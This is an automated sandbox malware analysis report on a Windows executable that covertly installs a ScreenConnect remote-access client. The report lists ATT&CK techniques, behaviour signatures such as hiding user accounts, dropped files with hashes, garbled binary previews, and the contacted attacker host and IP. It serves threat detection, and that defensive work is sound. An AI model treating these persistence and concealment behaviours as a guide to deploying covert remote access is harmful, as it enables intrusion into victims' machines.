                                  Replication Through Removable Media                                  		1
                                  Native API                                  		1
                                  DLL Search Order Hijacking                                  		1
                                  DLL Search Order Hijacking                                  		1
                                  Deobfuscate/Decode Files or Information                                  		LSASS Memory1
                                  File and Directory Discovery                                  		Remote Desktop ProtocolData from Removable Media1
                                  Non-Standard Port                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts12
                                  Command and Scripting Interpreter                                  		1
                                  Component Object Model Hijacking                                  		1
                                  Component Object Model Hijacking                                  		1
                                  Obfuscated Files or Information                                  		Security Account Manager55
                                  System Information Discovery                                  		SMB/Windows Admin SharesData from Network Shared Drive1
                                  Non-Application Layer Protocol                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCron1
                                  Valid Accounts                                  		1
                                  Valid Accounts                                  		1
                                  Software Packing                                  		NTDS41
                                  Security Software Discovery                                  		Distributed Component Object ModelInput Capture1
                                  Application Layer Protocol                                  		Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                                  Windows Service                                  		1
                                  Access Token Manipulation                                  		1
                                  DLL Side-Loading                                  		LSA Secrets2
                                  Process Discovery                                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                                  Bootkit                                  		2
                                  Windows Service                                  		1
                                  DLL Search Order Hijacking                                  		Cached Domain Credentials61
                                  Virtualization/Sandbox Evasion                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                                  Process Injection                                  		1
                                  File Deletion                                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                                  Masquerading                                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                  Valid Accounts                                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                  Access Token Manipulation                                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd61
                                  Virtualization/Sandbox Evasion                                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                                  Process Injection                                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                  Hidden Users                                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                                  Bootkit                                  		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                                  Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                                  Rundll32                                  		Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567468 Sample: tiG6Ep202n.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 44 57 sc.connectprotocol.es 2->57 65 Multi AV Scanner detection for submitted file 2->65 67 .NET source code contains potential unpacker 2->67 69 .NET source code references suspicious native API functions 2->69 71 3 other signatures 2->71 8 msiexec.exe 94 48 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 tiG6Ep202n.exe 6 2->15         started        17 svchost.exe 1 1 2->17         started        signatures3 process4 dnsIp5 45 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->45 dropped 47 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->47 dropped 49 C:\...\ScreenConnect.ClientService.exe, PE32 8->49 dropped 53 10 other files (1 malicious) 8->53 dropped 73 Enables network access during safeboot for specific services 8->73 75 Modifies security policies related information 8->75 19 msiexec.exe 8->19         started        21 msiexec.exe 1 8->21         started        23 msiexec.exe 8->23         started        59 sc.connectprotocol.es 38.69.12.167, 49710, 8041 54583US United States 12->59 77 Reads the Security eventlog 12->77 79 Reads the System eventlog 12->79 25 ScreenConnect.WindowsClient.exe 12->25         started        28 ScreenConnect.WindowsClient.exe 2 12->28         started        51 C:\Users\user\AppData\...\tiG6Ep202n.exe.log, ASCII 15->51 dropped 81 Contains functionality to hide user accounts 15->81 30 msiexec.exe 6 15->30         started        61 127.0.0.1 unknown unknown 17->61 file6 signatures7 process8 file9 33 rundll32.exe 11 19->33         started        83 Creates files in the system32 config directory 25->83 85 Contains functionality to hide user accounts 25->85 55 C:\Users\user\AppData\Local\...\MSI9606.tmp, PE32 30->55 dropped signatures10 process11 file12 37 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 33->37 dropped 39 C:\...\ScreenConnect.InstallerActions.dll, PE32 33->39 dropped 41 C:\Users\user\...\ScreenConnect.Core.dll, PE32 33->41 dropped 43 4 other files (none is malicious) 33->43 dropped 63 Contains functionality to hide user accounts 33->63 signatures13

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  tiG6Ep202n.exe26%ReversingLabsWin32.Trojan.Generic

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI9606.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Windows\Installer\MSI9C7F.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSIA097.tmp0%ReversingLabs

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  No Antivirus matches

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  sc.connectprotocol.es
                                  		38.69.12.167
                                  		truefalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000A.00000003.2233323680.0000027B7C2D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.drfalse
                                      		high
                                      http://crl.ver)svchost.exe, 0000000A.00000002.3879697188.0000027B7C400000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                          		high
                                          https://g.live.com/odclientsettings/Prod1C:qmgr.db.10.drfalse
                                            		high
                                            http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametiG6Ep202n.exe, 00000000.00000002.2150232291.0000000003171000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.4013580934.0000000001364000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                                  		high
                                                  https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                                    		high
                                                    https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      38.69.12.167
                                                      		sc.connectprotocol.esUnited States
                                                      		5458354583USfalse

                                                      Private

                                                      IP
                                                      127.0.0.1

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1567468
                                                      Start date and time:2024-12-03 16:19:17 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 41s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Run name:Run with higher sleep bypass
                                                      Number of analysed new started processes analysed:14
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:tiG6Ep202n.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:58dff1cfcae1349d3e7cc009fb0cf1c109bdb4a5f3d2f8101ff9bd61d514a811.exe
                                                      Detection:MAL
                                                      Classification:mal44.evad.winEXE@18/58@1/2
                                                      EGA Information:
                                                      • Successful, ratio: 60%
                                                      HCA Information:
                                                      • Successful, ratio: 67%
                                                      • Number of executed functions: 355
                                                      • Number of non-executed functions: 2
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded IPs from analysis (whitelisted): 23.218.208.109
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target rundll32.exe, PID 1588 because it is empty
                                                      • Execution Graph export aborted for target tiG6Ep202n.exe, PID 5500 because it is empty
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                      • VT rate limit hit for: tiG6Ep202n.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      38.69.12.167f53WqfzzNt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                1g6DULljd2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                  2nmtr41l0S.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        sc.connectprotocol.esf53WqfzzNt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        1g6DULljd2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        2nmtr41l0S.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        54583USf53WqfzzNt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        1g6DULljd2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        2nmtr41l0S.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167
                                                                        lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 38.69.12.167

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dllf53WqfzzNt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                          6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                            hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                              lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  VVs9SAqm5N.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                    1g6DULljd2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                      2nmtr41l0S.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                          C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dllf53WqfzzNt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                            6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                              hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                  pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                    VVs9SAqm5N.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                      1g6DULljd2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                        2nmtr41l0S.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                          pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                            Created / dropped Files

                                                                                                            C:\Config.Msi\6699fe.rbs

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):219471
                                                                                                            Entropy (8bit):6.58204371630186
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:UW9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG4:UWuH2aCGw1ST1wQLdqv4
                                                                                                            MD5:D6F423C84C4668BEACF7F1A068B22074
                                                                                                            SHA1:DCAF4C7045F4C4C582D91B7CA936F1FA7F4A6473
                                                                                                            SHA-256:AA09E9BE5C5E9831A9F3D125010245A1D0EE11634E9A628E01E612DF23E0FB1E
                                                                                                            SHA-512:9F0AAC6CC1F065A5E9A41F69C2295057E32F3741D12AB33D3C3385FB14CEC9EDE2276F9173C740934C541640B2B43613F55A8FC4E48EFD2F7124AB4A893006A5
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\6699fe.rbs, Author: Joe Security
                                                                                                            Preview:...@IXOS.@.....@.R.Y.@.....@.....@.....@.....@.....@......&.{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}'.ScreenConnect Client (a532d472f1ff1d4e)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (a532d472f1ff1d4e)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{CF9AE42D-A542-A5BE-DF54-2B1FF488B5E3}&.{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}.@......&.{9509AE8A-E997-4132-8CAB-BAFE89DF77F6}&.{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}.@......&.{8B377FBF-DB9A-CC34-86C5-7376F38045E2}&.{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}.@......&.{323CD391-BE8F-8C69-EEBD-0C2E11594F31}&.{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}.@......&.{992F76AD-4404-BDC8-9819-6B28811D5620}&.{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}.@......&.{63515BD8-20DD-F293-D546-00656A7D96D3}&.{BD3FDC30-5D5E-2216-6CDD

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\Client.en-US.resources

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):50133
                                                                                                            Entropy (8bit):4.759054454534641
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                            MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                            SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                            SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                            SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                            Malicious:false
                                                                                                            Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\Client.resources

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26722
                                                                                                            Entropy (8bit):7.7401940386372345
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                            MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                            SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                            SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                            SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                            Malicious:false
                                                                                                            Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):197120
                                                                                                            Entropy (8bit):6.586775768189165
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                                                            MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                                                            SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                                                            SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                                                                                            SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: f53WqfzzNt.exe, Detection: malicious, Browse
                                                                                                            • Filename: 6IqUjK9Koj.exe, Detection: malicious, Browse
                                                                                                            • Filename: hB52OUUCE2.exe, Detection: malicious, Browse
                                                                                                            • Filename: lCwus2wfk6.exe, Detection: malicious, Browse
                                                                                                            • Filename: pbenHWj8JO.exe, Detection: malicious, Browse
                                                                                                            • Filename: VVs9SAqm5N.exe, Detection: malicious, Browse
                                                                                                            • Filename: 1g6DULljd2.exe, Detection: malicious, Browse
                                                                                                            • Filename: 2nmtr41l0S.exe, Detection: malicious, Browse
                                                                                                            • Filename: pbenHWj8JO.exe, Detection: malicious, Browse
